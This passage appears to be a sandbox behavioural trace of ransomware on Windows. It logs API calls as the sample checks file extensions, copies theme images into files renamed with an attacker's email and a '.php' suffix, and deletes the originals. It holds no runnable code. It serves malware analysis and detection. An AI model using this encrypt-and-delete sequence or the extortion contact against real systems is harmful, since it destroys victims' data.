returned 1 [0047.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.039] lstrlenW (lpString=".doc") returned 4 [0047.039] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.039] lstrlenW (lpString=".docx") returned 5 [0047.039] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.039] lstrlenW (lpString=".pdf") returned 4 [0047.039] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.039] lstrlenW (lpString=".xls") returned 4 [0047.039] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.039] lstrlenW (lpString=".xlsx") returned 5 [0047.039] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.039] lstrlenW (lpString=".ppt") returned 4 [0047.039] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.039] lstrlenW (lpString=".zip") returned 4 [0047.039] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.039] lstrlenW (lpString=".rar") returned 4 [0047.039] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.039] lstrlenW (lpString=".bz2") returned 4 [0047.039] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.039] lstrlenW (lpString=".7z") returned 3 [0047.039] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.039] lstrlenW (lpString=".dbf") returned 4 [0047.039] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.039] lstrlenW (lpString=".1cd") returned 4 [0047.040] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.040] lstrlenW (lpString=".jpg") returned 4 [0047.040] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.040] lstrlenW (lpString=".doc") returned 4 [0047.040] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.040] lstrlenW (lpString=".docx") returned 5 [0047.040] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.040] lstrlenW (lpString=".pdf") returned 4 [0047.040] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.040] lstrlenW (lpString=".xls") returned 4 [0047.040] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.040] lstrlenW (lpString=".xlsx") returned 5 [0047.040] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.040] lstrlenW (lpString=".ppt") returned 4 [0047.040] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.040] lstrlenW (lpString=".zip") returned 4 [0047.040] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.040] lstrlenW (lpString=".rar") returned 4 [0047.040] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.040] lstrlenW (lpString=".bz2") returned 4 [0047.040] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.040] lstrlenW (lpString=".7z") returned 3 [0047.040] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.040] lstrlenW (lpString=".dbf") returned 4 [0047.040] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.041] lstrlenW (lpString=".1cd") returned 4 [0047.041] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0047.041] lstrlenW (lpString=".jpg") returned 4 [0047.041] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.041] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.041] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.278] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=60724) returned 1 [0047.278] CloseHandle (hObject=0x210) returned 1 [0047.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 0x20 [0047.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.278] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.280] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.288] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.297] GetLastError () returned 0x0 [0047.304] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xed34, lpOverlapped=0x0) returned 1 [0047.307] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xed40, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xed40, lpOverlapped=0x0) returned 1 [0047.309] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.309] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.309] SetEndOfFile (hFile=0x194) returned 1 [0047.309] CloseHandle (hObject=0x194) returned 1 [0047.309] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.309] SetEndOfFile (hFile=0x210) returned 1 [0047.310] CloseHandle (hObject=0x210) returned 1 [0047.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.310] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 1 [0047.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.310] lstrlenW (lpString=".doc") returned 4 [0047.311] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.311] lstrlenW (lpString=".docx") returned 5 [0047.311] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.311] lstrlenW (lpString=".pdf") returned 4 [0047.311] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.311] lstrlenW (lpString=".xls") returned 4 [0047.311] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.311] lstrlenW (lpString=".xlsx") returned 5 [0047.311] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.311] lstrlenW (lpString=".ppt") returned 4 [0047.311] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.311] lstrlenW (lpString=".zip") returned 4 [0047.311] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.311] lstrlenW (lpString=".rar") returned 4 [0047.311] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.311] lstrlenW (lpString=".bz2") returned 4 [0047.311] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.311] lstrlenW (lpString=".7z") returned 3 [0047.311] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.311] lstrlenW (lpString=".dbf") returned 4 [0047.311] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.311] lstrlenW (lpString=".1cd") returned 4 [0047.311] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.311] lstrlenW (lpString=".jpg") returned 4 [0047.311] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.311] lstrlenW (lpString=".doc") returned 4 [0047.311] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.311] lstrlenW (lpString=".docx") returned 5 [0047.312] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.312] lstrlenW (lpString=".pdf") returned 4 [0047.312] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.312] lstrlenW (lpString=".xls") returned 4 [0047.312] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.312] lstrlenW (lpString=".xlsx") returned 5 [0047.312] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.312] lstrlenW (lpString=".ppt") returned 4 [0047.312] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.312] lstrlenW (lpString=".zip") returned 4 [0047.312] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.312] lstrlenW (lpString=".rar") returned 4 [0047.312] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.312] lstrlenW (lpString=".bz2") returned 4 [0047.312] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.312] lstrlenW (lpString=".7z") returned 3 [0047.312] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.312] lstrlenW (lpString=".dbf") returned 4 [0047.312] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.312] lstrlenW (lpString=".1cd") returned 4 [0047.312] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0047.312] lstrlenW (lpString=".jpg") returned 4 [0047.312] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.312] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.312] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.313] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1659) returned 1 [0047.313] CloseHandle (hObject=0x210) returned 1 [0047.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 0x20 [0047.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.313] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.313] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.315] GetLastError () returned 0x0 [0047.315] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x67b, lpOverlapped=0x0) returned 1 [0047.317] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x680, lpOverlapped=0x0) returned 1 [0047.318] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.318] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.318] SetEndOfFile (hFile=0x194) returned 1 [0047.318] CloseHandle (hObject=0x194) returned 1 [0047.318] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.318] SetEndOfFile (hFile=0x210) returned 1 [0047.319] CloseHandle (hObject=0x210) returned 1 [0047.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.319] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 1 [0047.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.319] lstrlenW (lpString=".doc") returned 4 [0047.319] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.319] lstrlenW (lpString=".docx") returned 5 [0047.319] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.320] lstrlenW (lpString=".pdf") returned 4 [0047.320] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.320] lstrlenW (lpString=".xls") returned 4 [0047.320] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.320] lstrlenW (lpString=".xlsx") returned 5 [0047.320] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.320] lstrlenW (lpString=".ppt") returned 4 [0047.320] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.320] lstrlenW (lpString=".zip") returned 4 [0047.320] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.320] lstrlenW (lpString=".rar") returned 4 [0047.320] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.320] lstrlenW (lpString=".bz2") returned 4 [0047.320] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.320] lstrlenW (lpString=".7z") returned 3 [0047.320] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.320] lstrlenW (lpString=".dbf") returned 4 [0047.320] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.320] lstrlenW (lpString=".1cd") returned 4 [0047.320] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.320] lstrlenW (lpString=".jpg") returned 4 [0047.320] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.320] lstrlenW (lpString=".doc") returned 4 [0047.320] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.320] lstrlenW (lpString=".docx") returned 5 [0047.320] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.320] lstrlenW (lpString=".pdf") returned 4 [0047.320] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.321] lstrlenW (lpString=".xls") returned 4 [0047.321] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.321] lstrlenW (lpString=".xlsx") returned 5 [0047.321] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.321] lstrlenW (lpString=".ppt") returned 4 [0047.321] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.321] lstrlenW (lpString=".zip") returned 4 [0047.321] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.321] lstrlenW (lpString=".rar") returned 4 [0047.321] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.321] lstrlenW (lpString=".bz2") returned 4 [0047.321] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.321] lstrlenW (lpString=".7z") returned 3 [0047.321] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.321] lstrlenW (lpString=".dbf") returned 4 [0047.321] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.321] lstrlenW (lpString=".1cd") returned 4 [0047.321] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.321] lstrlenW (lpString=".jpg") returned 4 [0047.321] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.321] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.321] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.322] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=44850) returned 1 [0047.322] CloseHandle (hObject=0x210) returned 1 [0047.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 0x20 [0047.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.323] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.323] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.323] GetLastError () returned 0x0 [0047.323] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xaf32, lpOverlapped=0x0) returned 1 [0047.325] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xaf40, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xaf40, lpOverlapped=0x0) returned 1 [0047.327] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.327] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.327] SetEndOfFile (hFile=0x194) returned 1 [0047.327] CloseHandle (hObject=0x194) returned 1 [0047.327] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.327] SetEndOfFile (hFile=0x210) returned 1 [0047.328] CloseHandle (hObject=0x210) returned 1 [0047.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.329] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 1 [0047.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.329] 